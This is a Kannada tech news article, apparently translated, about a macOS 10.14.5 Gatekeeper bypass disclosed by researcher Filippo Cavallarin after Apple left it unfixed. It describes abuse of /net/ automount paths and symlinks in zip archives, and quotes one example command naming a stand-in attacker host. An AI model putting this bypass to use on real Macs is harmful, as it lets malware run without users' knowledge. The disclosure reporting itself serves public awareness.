Mac ನಲ್ಲಿ ದುರುದ್ದೇಶಪೂರಿತ ಅಪ್ಲಿಕೇಶನ್ ಅನ್ನು ಸ್ಥಾಪಿಸುವುದು ಸುಲಭ. ಮೂರು ತಿಂಗಳ ನಂತರವೂ ಆಪಲ್ ದೋಷವನ್ನು ಸರಿಪಡಿಸಿಲ್ಲ

ಅಕ್ಟೋಬರ್ 27, 5

ಭದ್ರತಾ ಸಂಶೋಧಕ Filippo Cavallarin ತನ್ನ ಬ್ಲಾಗ್‌ನಲ್ಲಿ macOS 10.14.5 ನಲ್ಲಿನ ದೋಷದ ಕುರಿತು ಎಚ್ಚರಿಕೆಯನ್ನು ಪೋಸ್ಟ್ ಮಾಡಿದ್ದಾರೆ. ಗೇಟ್‌ಕೀಪರ್‌ನ ಭದ್ರತಾ ಕ್ರಮಗಳನ್ನು ಸಂಪೂರ್ಣವಾಗಿ ಬೈಪಾಸ್ ಮಾಡುವ ಸಾಧ್ಯತೆಯನ್ನು ಇದು ಒಳಗೊಂಡಿದೆ. ಕ್ಯಾವಲ್ಲರಿನ್ ಪ್ರಕಾರ, ಅವರು ಈ ವರ್ಷದ ಫೆಬ್ರವರಿಯಲ್ಲಿ ಈಗಾಗಲೇ ಆಪಲ್‌ಗೆ ದೋಷವನ್ನು ತೋರಿಸಿದರು, ಆದರೆ ಕಂಪನಿಯು ಇತ್ತೀಚಿನ ನವೀಕರಣದಲ್ಲಿ ಅದನ್ನು ಸರಿಪಡಿಸಲಿಲ್ಲ.

ಗೇಟ್‌ಕೀಪರ್ ಅನ್ನು Apple ಅಭಿವೃದ್ಧಿಪಡಿಸಿದೆ ಮತ್ತು 2012 ರಲ್ಲಿ ಮೊದಲ ಬಾರಿಗೆ ಅದರ ಡೆಸ್ಕ್‌ಟಾಪ್ ಆಪರೇಟಿಂಗ್ ಸಿಸ್ಟಮ್‌ಗೆ ಸಂಯೋಜಿಸಲಾಗಿದೆ. ಇದು ಬಳಕೆದಾರರ ಜ್ಞಾನ ಮತ್ತು ಒಪ್ಪಿಗೆಯಿಲ್ಲದೆ ಅಪ್ಲಿಕೇಶನ್ ಚಾಲನೆಯಾಗದಂತೆ ತಡೆಯುವ ಕಾರ್ಯವಿಧಾನವಾಗಿದೆ. ನೀವು ಅಪ್ಲಿಕೇಶನ್ ಅನ್ನು ಡೌನ್‌ಲೋಡ್ ಮಾಡಿದ ನಂತರ, ಗೇಟ್‌ಕೀಪರ್ ಅದರ ಕೋಡ್ ಅನ್ನು ಸ್ವಯಂಚಾಲಿತವಾಗಿ ಆಪಲ್‌ನಿಂದ ಸಾಫ್ಟ್‌ವೇರ್ ಸರಿಯಾಗಿ ಸಹಿ ಮಾಡಿದೆಯೇ ಎಂದು ಪರಿಶೀಲಿಸುತ್ತದೆ.

ತನ್ನ ಬ್ಲಾಗ್ ಪೋಸ್ಟ್‌ನಲ್ಲಿ, ಗೇಟ್‌ಕೀಪರ್ ಪೂರ್ವನಿಯೋಜಿತವಾಗಿ, ಬಾಹ್ಯ ಸಂಗ್ರಹಣೆ ಮತ್ತು ನೆಟ್‌ವರ್ಕ್ ಷೇರುಗಳನ್ನು ಸುರಕ್ಷಿತ ಸ್ಥಳಗಳೆಂದು ಪರಿಗಣಿಸುತ್ತಾನೆ ಎಂದು ಕ್ಯಾವಲ್ಲರಿನ್ ಗಮನಿಸುತ್ತಾನೆ. ಈ ಗುರಿಗಳಲ್ಲಿ ನೆಲೆಸಿರುವ ಯಾವುದೇ ಅಪ್ಲಿಕೇಶನ್ ಆದ್ದರಿಂದ ಗೇಟ್‌ಕೀಪರ್ ಪರಿಶೀಲನೆಯ ಮೂಲಕ ಹೋಗದೆಯೇ ಸ್ವಯಂಚಾಲಿತವಾಗಿ ಪ್ರಾರಂಭಿಸಬಹುದು. ಬಳಕೆದಾರರ ಅರಿವಿಲ್ಲದೆ ದುರುದ್ದೇಶಪೂರಿತ ಸಾಫ್ಟ್‌ವೇರ್ ಅನ್ನು ಪ್ರಾರಂಭಿಸಲು ಈ ವೈಶಿಷ್ಟ್ಯವನ್ನು ಬಳಸಿಕೊಳ್ಳಬಹುದು.

ಅನಧಿಕೃತ ಪ್ರವೇಶವನ್ನು ಅನುಮತಿಸುವ ಒಂದು ಅಂಶವೆಂದರೆ ಸ್ವಯಂ ಮೌಂಟ್ ವೈಶಿಷ್ಟ್ಯ, ಇದು "/net/" ನೊಂದಿಗೆ ಪ್ರಾರಂಭವಾಗುವ ಮಾರ್ಗವನ್ನು ನಿರ್ದಿಷ್ಟಪಡಿಸುವ ಮೂಲಕ ಸ್ವಯಂಚಾಲಿತವಾಗಿ ನೆಟ್‌ವರ್ಕ್ ಹಂಚಿಕೆಯನ್ನು ಆರೋಹಿಸಲು ಬಳಕೆದಾರರನ್ನು ಅನುಮತಿಸುತ್ತದೆ. ಉದಾಹರಣೆಯಾಗಿ, ಕ್ಯಾವಲ್ಲಾರಿನ್ "ls /net/evil-attacker.com/sharedfolder/" ಮಾರ್ಗವನ್ನು ಉಲ್ಲೇಖಿಸುತ್ತಾನೆ, ಇದು ಆಪರೇಟಿಂಗ್ ಸಿಸ್ಟಮ್ "ಷೇರ್‌ಫೋಲ್ಡರ್" ಫೋಲ್ಡರ್‌ನ ವಿಷಯಗಳನ್ನು ದೂರಸ್ಥ ಸ್ಥಳದಲ್ಲಿ ಲೋಡ್ ಮಾಡಲು ಕಾರಣವಾಗಬಹುದು ಅದು ದುರುದ್ದೇಶಪೂರಿತವಾಗಿದೆ.

ವೀಡಿಯೊದಲ್ಲಿ ಬೆದರಿಕೆ ಹೇಗೆ ಕಾರ್ಯನಿರ್ವಹಿಸುತ್ತದೆ ಎಂಬುದನ್ನು ನೀವು ವೀಕ್ಷಿಸಬಹುದು:

ಆಟೋಮೌಂಟ್ ಕಾರ್ಯಕ್ಕೆ ಕಾರಣವಾಗುವ ನಿರ್ದಿಷ್ಟ ಸಿಮ್‌ಲಿಂಕ್ ಅನ್ನು ಹೊಂದಿರುವ ಜಿಪ್ ಆರ್ಕೈವ್ ಅನ್ನು ಹಂಚಿಕೊಂಡರೆ, ಅದನ್ನು ಗೇಟ್‌ಕೀಪರ್ ಪರಿಶೀಲಿಸುವುದಿಲ್ಲ ಎಂಬುದು ಇನ್ನೊಂದು ಅಂಶವಾಗಿದೆ. ಈ ರೀತಿಯಾಗಿ, ಬಲಿಪಶು ಸುಲಭವಾಗಿ ದುರುದ್ದೇಶಪೂರಿತ ಆರ್ಕೈವ್ ಅನ್ನು ಡೌನ್‌ಲೋಡ್ ಮಾಡಬಹುದು ಮತ್ತು ಅದನ್ನು ಅನ್ಜಿಪ್ ಮಾಡಬಹುದು, ಆಕ್ರಮಣಕಾರರಿಗೆ ಬಳಕೆದಾರರ ಅರಿವಿಲ್ಲದೆ ಮ್ಯಾಕ್‌ನಲ್ಲಿ ವಾಸ್ತವಿಕವಾಗಿ ಯಾವುದೇ ಸಾಫ್ಟ್‌ವೇರ್ ಅನ್ನು ಚಲಾಯಿಸಲು ಅನುವು ಮಾಡಿಕೊಡುತ್ತದೆ. ಡೀಫಾಲ್ಟ್ ಆಗಿ ಕೆಲವು ವಿಸ್ತರಣೆಗಳನ್ನು ಮರೆಮಾಡುವ ಫೈಂಡರ್, ಈ ದುರ್ಬಲತೆಯ ಪಾಲನ್ನು ಸಹ ಹೊಂದಿದೆ.

ಈ ವರ್ಷದ ಫೆಬ್ರವರಿ 22 ರಂದು ಮ್ಯಾಕೋಸ್ ಆಪರೇಟಿಂಗ್ ಸಿಸ್ಟಂನ ದುರ್ಬಲತೆಯ ಬಗ್ಗೆ ಆಪಲ್ ಗಮನ ಸೆಳೆದಿದೆ ಎಂದು ಕ್ಯಾವಲ್ಲಾರಿನ್ ತನ್ನ ಬ್ಲಾಗ್‌ನಲ್ಲಿ ಹೇಳಿದ್ದಾರೆ. ಆದರೆ ಮೇ ಮಧ್ಯದಲ್ಲಿ, ಆಪಲ್ ಕ್ಯಾವಲ್ಲರಿನ್ ಜೊತೆ ಸಂವಹನ ಮಾಡುವುದನ್ನು ನಿಲ್ಲಿಸಿತು, ಆದ್ದರಿಂದ ಕ್ಯಾವಲ್ಲರಿನ್ ಇಡೀ ವಿಷಯವನ್ನು ಸಾರ್ವಜನಿಕಗೊಳಿಸಲು ನಿರ್ಧರಿಸಿದರು.

ಮೂಲ: FCVL

ವಿಷಯಗಳು: ಸಂಗ್ರಹಣೆ, ಸ್ವಯಂಚಾಲಿತವಾಗಿ, ಮ್ಯಾಕೋಸ್, ದೃಶ್ಯ, ಸಂಯೋಜನೆಗಳು, ಕಾರ್ಯ, ಬಳಕೆದಾರ, ಅಪ್ಲಿಕೇಸ್, ಆಪಲ್

ಲೇಖನದ ಚರ್ಚೆ

ನಿಮ್ಮ ಹೆಸರು

ನಿಮ್ಮ ಅನಿಸಿಕೆ

ಮೇಲಿನ ಡೇಟಾವನ್ನು ಭರ್ತಿ ಮಾಡುವ ಮೂಲಕ, ಕಂಪನಿಯು TEXT FACTORY s.r.o., ಬ್ರನೋದಲ್ಲಿ ನೋಂದಾಯಿತ ಕಚೇರಿ, Durďákova 336/29, Černá Pole, ZIP ಕೋಡ್: 613 00, ID ಸಂಖ್ಯೆ: 06157831, ಪ್ರಾದೇಶಿಕ ನ್ಯಾಯಾಲಯದಲ್ಲಿ Brno, ಸೆಕ್ಷನ್ C ನಲ್ಲಿ ನೋಂದಾಯಿಸಲಾಗಿದೆ ಎಂದು ನಾನು ಅಂಗೀಕರಿಸುತ್ತೇನೆ. , 100399 ಅನ್ನು ಸೇರಿಸಿ, ಆರ್ಟಿಕಲ್ 6 ಪ್ಯಾರಾಗ್ರಾಫ್ 1 ಪತ್ರದ ಪ್ರಕಾರ TEXT FACTORY s.r.o ನ ಕಾನೂನುಬದ್ಧ ಆಸಕ್ತಿಗಳ ಆಧಾರದ ಮೇಲೆ ನಾನು ಭರ್ತಿ ಮಾಡಿದ ನೋಂದಣಿ ಫಾರ್ಮ್‌ನಲ್ಲಿ ಒದಗಿಸಿದ ನನ್ನ ವೈಯಕ್ತಿಕ ಡೇಟಾವನ್ನು ಪ್ರಕ್ರಿಯೆಗೊಳಿಸುತ್ತದೆ ಎಫ್) GDPR ಮತ್ತು ಕಾನೂನು ಬಾಧ್ಯತೆಗಳನ್ನು ಪೂರೈಸಲು (ಲೇಖನ 6, ಪ್ಯಾರಾಗ್ರಾಫ್ 1, ಪತ್ರ ಸಿ) GDPR), ಈ ಕೆಳಗಿನ ಉದ್ದೇಶಗಳಿಗಾಗಿ: ಪ್ರಕಟಿತ ಲೇಖನಗಳಿಗೆ ಅಥವಾ ಚರ್ಚೆಯೊಳಗೆ ಸಕ್ರಿಯವಾಗಿ ಕೊಡುಗೆ ನೀಡಲು TEXT FACTORY s.r.o ನಿರ್ವಹಿಸುವ ವೆಬ್‌ಸೈಟ್‌ಗಳಿಗೆ ಭೇಟಿ ನೀಡುವವರ ಅಧಿಕಾರವನ್ನು ಖಚಿತಪಡಿಸಿಕೊಳ್ಳುವ ಅಗತ್ಯತೆ ವೇದಿಕೆಗಳು ಮತ್ತು ಈ ಚರ್ಚಾ ವೇದಿಕೆಗಳ ನಿರ್ವಾಹಕರಾಗಿ TEXT FACTORY s.r.o. ನ ಹಕ್ಕುಗಳನ್ನು ಚಲಾಯಿಸುವುದು. ವೈಯಕ್ತಿಕ ಡೇಟಾ ಮತ್ತು ಹಕ್ಕುಗಳ ಪ್ರಕ್ರಿಯೆಯ ಕುರಿತು ಹೆಚ್ಚಿನ ಮಾಹಿತಿಯನ್ನು ಕಾಣಬಹುದು ವೈಯಕ್ತಿಕ ಡೇಟಾ ರಕ್ಷಣೆಯ ಪಾಠಗಳು. ಸಂಪೂರ್ಣ ಪಠ್ಯ

ಇದು ಆಗಿರಬಹುದು ನಿಮಗೆ ಆಸಕ್ತಿ

ಸಂಬಂಧಿಸಿದೆ